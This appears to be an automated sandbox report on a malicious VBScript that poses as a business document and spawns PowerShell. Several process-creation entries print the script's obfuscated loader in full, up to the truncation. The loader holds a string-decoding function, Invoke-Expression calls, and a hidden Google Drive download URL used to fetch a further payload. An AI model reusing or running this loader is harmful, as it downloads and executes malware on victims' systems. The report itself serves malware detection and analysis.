Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'aflytningsudstyrene Sortkridtstegningerne myoparalysis Rivinian Undgldes Chowtime Anodynia Betoningerne Blyantstegninger Frydefuld Whacker Prvekrt Kendemrket Fjernsynets Oligocarpous Hawkshaws Underlegenhedsflelserne Sortspttes Boleroers Opklares Kamsin Archin intetanendes Exhaustibility aflytningsudstyrene Sortkridtstegningerne myoparalysis Rivinian Undgldes Chowtime Anodynia Betoningerne Blyantstegninger Frydefuld Whacker Prvekrt Kendemrket Fjernsynets Oligocarpous Hawkshaws Underlegenhedsflelserne Sortspttes Boleroers Opklares Kamsin Archin intetanendes Exhaustibility';If (${host}.CurrentCulture) {$reinvigorate++;}Function Reeling($Takkende){$Mjavende=$Takkende.Length-$reinvigorate;$Neocortical='SUBsTRI';$Neocortical+='ng';For( $kngtende=2;$kngtende -lt $Mjavende;$kngtende+=3){$aflytningsudstyrene+=$Takkende.$Neocortical.Invoke( $kngtende, $reinvigorate);}$aflytningsudstyrene;}function Convictively($Mispainted){ . ($Aabningstid) ($Mispainted);}$lignings=Reeling ' ,MHwo,ozSciColP,lKiaOv/Sh5F..Ta0En F(SeW AiNonTcdCioB,wH,sTe FlN KTSk Fi1.y0Fo.C 0Ly;U. ,WStiSpn l6be4ei; , .kx u6 ,4,i;In LorInvun: a1Ac2Ag1F .Be0,i)Af ,oG aesicKakdeo S/Sk2Ir0Ny1Ol0Ou0Op1Fl0Sa1K, DeFReiRerYdeRafEso,axOp/ u1 S2 ,1Sk.Be0M, ';$Triatomicity=Reeling 'InUP s,ue SrCa-NoAOeg iefinVat a ';$Undgldes=Reeling ' Fh At,etCep ks P:In/Dr/Sed,lrt,iO.vSueCh. VgVao ,oPegBalCaee .LecFroS,m.a/M.u ecSe?B,e,hx npDioA,r.atLn=PodWaoR.wS,nGol GoS a.rd T&F,iSjdSt= P1anX SwObI.aR rDiEl,g ytAfX .8Ude ,QPuUTii.seMaZWhQSe- FQt.rLa9PrkStkMeHRe3PrQMuyAf6 ,a DiGos.gxSu ';$Alytes=Reeling ' G>P. ';$Aabningstid=Reeling ',riS.e axEs ';$Proboscidiferous='Betoningerne';$Friluftsmenneskerne = Reeling ' uenycI.h,ro . P%Una MpGop.nd.oa,rtOmaD.%Za\AgNSpoRenZic,hoS nHagA,eGesDrtA,im oB.nHa.A FRaoRer.e La&Ta&Se BaeIncA.hUnoPr sntNs ';Convictively (Reeling 'Di$TigFolTuoWab ea OlHa:,lF u Vs heSttTa=A ( ccSumTrdPs Ho/EncF. U$ rF .r .i ,lEuu uf VtStsSpmDee FnSunFaeArsRokOveGyrFan ,e .) ');Convictively (Reeling 'Re$.egB l ioB.bPlaPil S: R,oi mvEniN nIni .afanFo=sp$aiUCyn TdCag.pl RdReehysNo.sysCopIrl .iSyt .( $olAIml,hyGrt Ue es S) ');Convictively (Reeling 'D,[GlNK.eKatSu.OxS SeKerKov.oi.acO e FPHeoK i,onPet .MBaaBln ,a geleBir U]Bl:C.:SqSste.ecK.uBarN,iPit y BPNer eo FtF oZycPuo Tl.n R =Dr Ca[DiNTreKrtDy.U,SMeeRecSuuFrrU iint IyScPB rExo.st o PcLaoQulTrTAlyBopSte L] V:Tu:,fT MlM sB,1Y 2 u ');$Undgldes=$Rivinian[0];$Rengringsmidlets= (Reeling 'Pu$Q,gBal ,oLubP.aN,lPi:MeOM,pHagS.rVea.ivGueS.= ,N neRyw .-,lO Db Bj MeNocAptDe FSS.yPosUdtC,egom.d.HvN SeInt o.G.WSpe ObH CM,lAliWoe n At');$Rengringsmidlets+=$Fuset[1];Convictively ($Rengringsmidlets);Convictively (Reeling 'No$S,OB.pBagMor.aaF vBoe x.,eHskeTraKddTae .rA,s S[Be$GoT,arM,iBiaKnt Ko Sm RiTic.ri Ft yDe]L.=F.$ BlAfiPogArnF,i AnElgOvsfo ');$promachos=Reeling ' S$OsO ,p GgCorU,aGsvSkeK,.FrDIno ,wPrnB,lOfo RaKadGaF,ni

Detected potential crypto function

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_00007FFB4AE7C329	9_2_00007FFB4AE7C329
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_00007FFB4AE7B579	9_2_00007FFB4AE7B579
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_0500F1F0	13_2_0500F1F0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_0500FAC0	13_2_0500FAC0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_0500EEA8	13_2_0500EEA8

Java / VBScript file with very long strings (likely obfuscated code)

Source: 2669976595_366408723_KHI_SOF_240702_0957_P.vbs

Initial sample: Strings found which are bigger than 50

Yara signature match

Source: amsi32_3552.amsi.csv, type: OTHER	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 1296, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 3552, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution

Source: classification engine

Classification label: mal96.troj.expl.evad.winVBS@9/7@2/2

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\Noncongestion.For

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1612:120:WilError_03

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=1296
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=3552

Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\2669976595_366408723_KHI_SOF_240702_0957_P.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'aflytningsudstyrene Sortkridtstegningerne myoparalysis Rivinian Undgldes Chowtime Anodynia Betoningerne Blyantstegninger Frydefuld Whacker Prvekrt Kendemrket Fjernsynets Oligocarpous Hawkshaws Underlegenhedsflelserne Sortspttes Boleroers Opklares Kamsin Archin intetanendes Exhaustibility aflytningsudstyrene Sortkridtstegningerne myoparalysis Rivinian Undgldes Chowtime Anodynia Betoningerne Blyantstegninger Frydefuld Whacker Prvekrt Kendemrket Fjernsynets Oligocarpous Hawkshaws Underlegenhedsflelserne Sortspttes Boleroers Opklares Kamsin Archin intetanendes Exhaustibility';If (${host}.CurrentCulture) {$reinvigorate++;}Function Reeling($Takkende){$Mjavende=$Takkende.Length-$reinvigorate;$Neocortical='SUBsTRI';$Neocortical+='ng';For( $kngtende=2;$kngtende -lt $Mjavende;$kngtende+=3){$aflytningsudstyrene+=$Takkende.$Neocortical.Invoke( $kngtende, $reinvigorate);}$aflytningsudstyrene;}function Convictively($Mispainted){ . ($Aabningstid) ($Mispainted);}$lignings=Reeling ' ,MHwo,ozSciColP,lKiaOv/Sh5F..Ta0En F(SeW AiNonTcdCioB,wH,sTe FlN KTSk Fi1.y0Fo.C 0Ly;U. ,WStiSpn l6be4ei; , .kx u6 ,4,i;In LorInvun: a1Ac2Ag1F .Be0,i)Af ,oG aesicKakdeo S/Sk2Ir0Ny1Ol0Ou0Op1Fl0Sa1K, DeFReiRerYdeRafEso,axOp/ u1 S2 ,1Sk.Be0M, ';$Triatomicity=Reeling 'InUP s,ue SrCa-NoAOeg iefinVat a ';$Undgldes=Reeling ' Fh At,etCep ks P:In/Dr/Sed,lrt,iO.vSueCh. VgVao ,oPegBalCaee .LecFroS,m.a/M.u ecSe?B,e,hx npDioA,r.atLn=PodWaoR.wS,nGol GoS a.rd T&F,iSjdSt= P1anX SwObI.aR rDiEl,g ytAfX .8Ude ,QPuUTii.seMaZWhQSe- FQt.rLa9PrkStkMeHRe3PrQMuyAf6 ,a DiGos.gxSu ';$Alytes=Reeling ' G>P. ';$Aabningstid=Reeling ',riS.e axEs ';$Proboscidiferous='Betoningerne';$Friluftsmenneskerne = Reeling ' uenycI.h,ro . P%Una MpGop.nd.oa,rtOmaD.%Za\AgNSpoRenZic,hoS nHagA,eGesDrtA,im oB.nHa.A FRaoRer.e La&Ta&Se BaeIncA.hUnoPr sntNs ';Convictively (Reeling 'Di$TigFolTuoWab ea OlHa:,lF u Vs heSttTa=A ( ccSumTrdPs Ho/EncF. U$ rF .r .i ,lEuu uf VtStsSpmDee FnSunFaeArsRokOveGyrFan ,e .) ');Convictively (Reeling 'Re$.egB l ioB.bPlaPil S: R,oi mvEniN nIni .afanFo=sp$aiUCyn TdCag.pl RdReehysNo.sysCopIrl .iSyt .( $olAIml,hyGrt Ue es S) ');Convictively (Reeling 'D,[GlNK.eKatSu.OxS SeKerKov.oi.acO e FPHeoK i,onPet .MBaaBln ,a geleBir U]Bl:C.:SqSste.ecK.uBarN,iPit y BPNer eo FtF oZycPuo Tl.n R =Dr Ca[DiNTreKrtDy.U,SMeeRecSuuFrrU iint IyScPB rExo.st o PcLaoQulTrTAlyBopSte L] V:Tu:,fT MlM sB,1Y 2 u ');$Undgldes=$Rivinian[0];$Rengringsmidlets= (Reeling 'Pu$Q,gBal ,oLubP.aN,lPi:MeOM,pHagS.rVea.ivGueS.= ,N neRyw .-,lO Db Bj MeNocAptDe FSS.yPosUdtC,egom.d.HvN SeInt o.G.WSpe ObH CM,lAliWoe n At');$Rengringsmidlets+=$Fuset[1];Convictively ($Rengringsmidlets);Convictively (Reeling 'No$S,OB.pBagMor.aaF vBoe x.,eHskeTraKddTae .rA,s S[Be$GoT,arM,iBiaKnt Ko Sm RiTic.ri Ft yDe]L.=F.$ BlAfiPogArnF,i AnElgOvsfo ');$promachos=Reeling ' S$OsO ,p GgCorU,aGsvSkeK,.FrDIno ,wPrnB,lOfo RaKadGaF,ni
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Noncongestion.For && echo t"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'aflytningsudstyrene Sortkridtstegningerne myoparalysis Rivinian Undgldes Chowtime Anodynia Betoningerne Blyantstegninger Frydefuld Whacker Prvekrt Kendemrket Fjernsynets Oligocarpous Hawkshaws Underlegenhedsflelserne Sortspttes Boleroers Opklares Kamsin Archin intetanendes Exhaustibility aflytningsudstyrene Sortkridtstegningerne myoparalysis Rivinian Undgldes Chowtime Anodynia Betoningerne Blyantstegninger Frydefuld Whacker Prvekrt Kendemrket Fjernsynets Oligocarpous Hawkshaws Underlegenhedsflelserne Sortspttes Boleroers Opklares Kamsin Archin intetanendes Exhaustibility';If (${host}.CurrentCulture) {$reinvigorate++;}Function Reeling($Takkende){$Mjavende=$Takkende.Length-$reinvigorate;$Neocortical='SUBsTRI';$Neocortical+='ng';For( $kngtende=2;$kngtende -lt $Mjavende;$kngtende+=3){$aflytningsudstyrene+=$Takkende.$Neocortical.Invoke( $kngtende, $reinvigorate);}$aflytningsudstyrene;}function Convictively($Mispainted){ . ($Aabningstid) ($Mispainted);}$lignings=Reeling ' ,MHwo,ozSciColP,lKiaOv/Sh5F..Ta0En F(SeW AiNonTcdCioB,wH,sTe FlN KTSk Fi1.y0Fo.C 0Ly;U. ,WStiSpn l6be4ei; , .kx u6 ,4,i;In LorInvun: a1Ac2Ag1F .Be0,i)Af ,oG aesicKakdeo S/Sk2Ir0Ny1Ol0Ou0Op1Fl0Sa1K, DeFReiRerYdeRafEso,axOp/ u1 S2 ,1Sk.Be0M, ';$Triatomicity=Reeling 'InUP s,ue SrCa-NoAOeg iefinVat a ';$Undgldes=Reeling ' Fh At,etCep ks P:In/Dr/Sed,lrt,iO.vSueCh. VgVao ,oPegBalCaee .LecFroS,m.a/M.u ecSe?B,e,hx npDioA,r.atLn=PodWaoR.wS,nGol GoS a.rd T&F,iSjdSt= P1anX SwObI.aR rDiEl,g ytAfX .8Ude ,QPuUTii.seMaZWhQSe- FQt.rLa9PrkStkMeHRe3PrQMuyAf6 ,a DiGos.gxSu ';$Alytes=Reeling ' G>P. ';$Aabningstid=Reeling ',riS.e axEs ';$Proboscidiferous='Betoningerne';$Friluftsmenneskerne = Reeling ' uenycI.h,ro . P%Una MpGop.nd.oa,rtOmaD.%Za\AgNSpoRenZic,hoS nHagA,eGesDrtA,im oB.nHa.A FRaoRer.e La&Ta&Se BaeIncA.hUnoPr sntNs ';Convictively (Reeling 'Di$TigFolTuoWab ea OlHa:,lF u Vs heSttTa=A ( ccSumTrdPs Ho/EncF. U$ rF .r .i ,lEuu uf VtStsSpmDee FnSunFaeArsRokOveGyrFan ,e .) ');Convictively (Reeling 'Re$.egB l ioB.bPlaPil S: R,oi mvEniN nIni .afanFo=sp$aiUCyn TdCag.pl RdReehysNo.sysCopIrl .iSyt .( $olAIml,hyGrt Ue es S) ');Convictively (Reeling 'D,[GlNK.eKatSu.OxS SeKerKov.oi.acO e FPHeoK i,onPet .MBaaBln ,a geleBir U]Bl:C.:SqSste.ecK.uBarN,iPit y BPNer eo FtF oZycPuo Tl.n R =Dr Ca[DiNTreKrtDy.U,SMeeRecSuuFrrU iint IyScPB rExo.st o PcLaoQulTrTAlyBopSte L] V:Tu:,fT MlM sB,1Y 2 u ');$Undgldes=$Rivinian[0];$Rengringsmidlets= (Reeling 'Pu$Q,gBal ,oLubP.aN,lPi:MeOM,pHagS.rVea.ivGueS.= ,N neRyw .-,lO Db Bj MeNocAptDe FSS.yPosUdtC,egom.d.HvN SeInt o.G.WSpe ObH CM,lAliWoe n At');$Rengringsmidlets+=$Fuset[1];Convictively ($Rengringsmidlets);Convictively (Reeling 'No$S,OB.pBagMor.aaF vBoe x.,eHskeTraKddTae .rA,s S[Be$GoT,arM,iBiaKnt Ko Sm RiTic.ri Ft yDe]L.=F.$ BlAfiPogArnF,i AnElgOvsfo ');$promachos=Reeling ' S$OsO ,p GgCorU,aGsvSkeK,.FrDIno ,wPrnB,lOfo RaKadGaF,ni
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Noncongestion.For && echo t"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Noncongestion.For && echo t"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'aflytningsudstyrene Sortkridtstegningerne myoparalysis Rivinian Undgldes Chowtime Anodynia Betoningerne Blyantstegninger Frydefuld Whacker Prvekrt Kendemrket Fjernsynets Oligocarpous Hawkshaws Underlegenhedsflelserne Sortspttes Boleroers Opklares Kamsin Archin intetanendes Exhaustibility aflytningsudstyrene Sortkridtstegningerne myoparalysis Rivinian Undgldes Chowtime Anodynia Betoningerne Blyantstegninger Frydefuld Whacker Prvekrt Kendemrket Fjernsynets Oligocarpous Hawkshaws Underlegenhedsflelserne Sortspttes Boleroers Opklares Kamsin Archin intetanendes Exhaustibility';If (${host}.CurrentCulture) {$reinvigorate++;}Function Reeling($Takkende){$Mjavende=$Takkende.Length-$reinvigorate;$Neocortical='SUBsTRI';$Neocortical+='ng';For( $kngtende=2;$kngtende -lt $Mjavende;$kngtende+=3){$aflytningsudstyrene+=$Takkende.$Neocortical.Invoke( $kngtende, $reinvigorate);}$aflytningsudstyrene;}function Convictively($Mispainted){ . ($Aabningstid) ($Mispainted);}$lignings=Reeling ' ,MHwo,ozSciColP,lKiaOv/Sh5F..Ta0En F(SeW AiNonTcdCioB,wH,sTe FlN KTSk Fi1.y0Fo.C 0Ly;U. ,WStiSpn l6be4ei; , .kx u6 ,4,i;In LorInvun: a1Ac2Ag1F .Be0,i)Af ,oG aesicKakdeo S/Sk2Ir0Ny1Ol0Ou0Op1Fl0Sa1K, DeFReiRerYdeRafEso,axOp/ u1 S2 ,1Sk.Be0M, ';$Triatomicity=Reeling 'InUP s,ue SrCa-NoAOeg iefinVat a ';$Undgldes=Reeling ' Fh At,etCep ks P:In/Dr/Sed,lrt,iO.vSueCh. VgVao ,oPegBalCaee .LecFroS,m.a/M.u ecSe?B,e,hx npDioA,r.atLn=PodWaoR.wS,nGol GoS a.rd T&F,iSjdSt= P1anX SwObI.aR rDiEl,g ytAfX .8Ude ,QPuUTii.seMaZWhQSe- FQt.rLa9PrkStkMeHRe3PrQMuyAf6 ,a DiGos.gxSu ';$Alytes=Reeling ' G>P. ';$Aabningstid=Reeling ',riS.e axEs ';$Proboscidiferous='Betoningerne';$Friluftsmenneskerne = Reeling ' uenycI.h,ro . P%Una MpGop.nd.oa,rtOmaD.%Za\AgNSpoRenZic,hoS nHagA,eGesDrtA,im oB.nHa.A FRaoRer.e La&Ta&Se BaeIncA.hUnoPr sntNs ';Convictively (Reeling 'Di$TigFolTuoWab ea OlHa:,lF u Vs heSttTa=A ( ccSumTrdPs Ho/EncF. U$ rF .r .i ,lEuu uf VtStsSpmDee FnSunFaeArsRokOveGyrFan ,e .) ');Convictively (Reeling 'Re$.egB l ioB.bPlaPil S: R,oi mvEniN nIni .afanFo=sp$aiUCyn TdCag.pl RdReehysNo.sysCopIrl .iSyt .( $olAIml,hyGrt Ue es S) ');Convictively (Reeling 'D,[GlNK.eKatSu.OxS SeKerKov.oi.acO e FPHeoK i,onPet .MBaaBln ,a geleBir U]Bl:C.:SqSste.ecK.uBarN,iPit y BPNer eo FtF oZycPuo Tl.n R =Dr Ca[DiNTreKrtDy.U,SMeeRecSuuFrrU iint IyScPB rExo.st o PcLaoQulTrTAlyBopSte L] V:Tu:,fT MlM sB,1Y 2 u ');$Undgldes=$Rivinian[0];$Rengringsmidlets= (Reeling 'Pu$Q,gBal ,oLubP.aN,lPi:MeOM,pHagS.rVea.ivGueS.= ,N neRyw .-,lO Db Bj MeNocAptDe FSS.yPosUdtC,egom.d.HvN SeInt o.G.WSpe ObH CM,lAliWoe n At');$Rengringsmidlets+=$Fuset[1];Convictively ($Rengringsmidlets);Convictively (Reeling 'No$S,OB.pBagMor.aaF vBoe x.,eHskeTraKddTae .rA,s S[Be$GoT,arM,iBiaKnt Ko Sm RiTic.ri Ft yDe]L.=F.$ BlAfiPogArnF,i AnElgOvsfo ');$promachos=Reeling ' S$OsO ,p GgCorU,aGsvSkeK,.FrDIno ,wPrnB,lOfo RaKadGaF,ni	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Noncongestion.For && echo t"	Jump to behavior

Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptnet.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
